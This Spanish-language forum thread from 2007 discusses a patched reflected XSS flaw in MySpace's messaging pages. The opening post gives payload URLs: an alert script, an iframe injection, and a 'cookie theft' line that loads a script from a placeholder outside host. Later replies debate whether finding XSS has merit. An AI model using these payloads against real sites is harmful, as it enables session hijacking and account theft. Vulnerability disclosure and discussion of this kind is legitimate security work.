Xss in Myspace Robo de Cookies

Iniciado por Girl!, 12 Marzo 2007, 18:57 PM

0 Miembros y 1 Visitante están viendo este tema.

Girl!

Ha sido corregida

XSS in MySpace Robo de cookie. Descubierto y reportado por rMrGvG

Cuando queremos acceder a myspace a una direccion que no es la de inicio myspace.com(ejemplo http://messaging.myspace.com/index.cfm?fuseaction=mail.inbox&Mytoken=1 ) , este nos guarda la dirección completa en la cookie en los valores nextpage en la clave login de la misma ( fuseaction=login&nextPage=fuseaction=mail.inbox&mytoken=1) para redireccionarnos una vez logueados,a la variable mytoken podemos inyectarle código cerrandola mediante "> %22%3E también podemos inyectar en la variale friendID y asegurar la variable MyToken a 1de esta manera se ejecutaba el código tras loguearnos, pudiendo robar la cookie.

Aunque la inyección ya haya sido parcheada y nos hayan dejado publicarla, aun se puede demostrar la misma del siguiente modo, actualmente myspace pasa las variables a "> &quot;&gt; o nos da errores al usar < %3C sin embargo si nos logueamos erroneamente en myspace no se aplica la seguridad codificando los caracteres y vemos la inyección ahora mucho menos peligrosa, y que antes podía ser utilizada para robar cuentas de usuarios.

Ejemplo demostración de la inyeccion (debemos introducir una clave erronea para q nos muestre el código inyectado):
http://messaging.myspace.com/index.cfm?fuseaction=mail.inbox&Mytoken=">rMrGvG

Imagen inyección

XSS:
http://messaging.myspace.com/index.cfm?fuseaction=mail.message&friendID="><script>alert('rMrGvG')</script>&MyToken=1
http://messaging.myspace.com/index.cfm?fuseaction=mail.message&friendID="><iframe src=http://sni-labs.com></iframe>&MyToken=1

ROBO de cookies
http://messaging.myspace.com/index.cfm?fuseaction=mail.message&friendID=<script src="http://url/script.js"></script>&MyToken=1

Fuente http://sni-labs.com

ANELKAOS

Muy buena :) estas poniendo bien alto el listón de los XSS jeje

putus


Girl!

Sap eso pone al principio del tema :)
aquí está el momby aunque ya ha terminado y  las más importantes corregidas , pero ene l ultimo del dia 30 aparece el popurrí y algunas aun vann :)
A pàrte se muestras XSS y formas de evadirlos muy interesantess
BIssos
:-* :-* :-* :-* :-*
MOMBY:

http://sni-labs.com/MOMBY/

yeikos

Heché un vistazo rápido a la lista de fallos y no encontré ninguno que funcionara.

Ahora este tipo se ha hecho famoso por encontrar un XSS en cada variable de myspace, bueno, no por el hecho de encontrarlas, que eso no tiene mucho merito, si no por el hecho de publicarlas...

Girl!

no sé a q tipo te refieres si es  a MOndo o MUstachio desde luego momby, es un pryecto donde participaron grandes, como Rsnake (ha.ckers.org), Mustlive o Awesome Andrew

Bissuus  :-* :-* :-*

yeikos

Queria decir que las inyecciones XSS no tienen ningún merito encontrarlas, muchas páginas webs importantes las sufren, veáse Hotmail o Yahoo.

Digo que no tiene merito porque no es un fallo del sistema, si no un fallo del programador...

oRTNZ

xd.. siguen..
por mi parte puedo decir que web QUE NO haya  encontrado YO que no tenga injeccion o xss, pues QUE TIREN LA PRIMERA PIEDRA "QUIEN NO TENGA TAL PROBLEMA", aun mayor ... las variables las PODEMOS CREAR TODOS  :P, ADEMAS sigue teniendo el bug... hotmail xd  sin mas que decirles un saludo!
pd:
Citares un pryecto donde participaron grandes, como
GRANDES, no Gril! PUBICOS  ;D.
(31 del 12 de 2005) un dia que recuerdo siempre! :p
(03 del 08 de 2006) otro dia que lo recordare siempre...
Si eres Peruano, QUEDATE y si quieres ser de segunda mano del pais que fueras, pues LARGATE Y NO REGRESES...

Man-In-the-Middle

De Peru??? oRTNZ  :xD ,es bueno saber, el bug corre de hotmail, pero bajo Firefox, en iE no peta,

saludos..,//
MITM

yeikos

Cita de: Man-In-the-Middle en  7 Mayo 2007, 05:35 AM
De Peru??? oRTNZ  :xD ,es bueno saber, el bug corre de hotmail, pero bajo Firefox, en iE no peta,

saludos..,//
MITM

Eso dependerá de la configuración que tengas en tu Internet Explorer.

Hotmail está lleno de inyecciones XSS, yo me puse una tarde y saqué dos que no estaban publicadas, y por muchos foros veo cada día inyecciones a Hotmail y otras páginas webs.

¿Conclusión? No hay que ser "uno de los grandes" para encontrar una inyección XSS/SQL, y menos en myspace beta.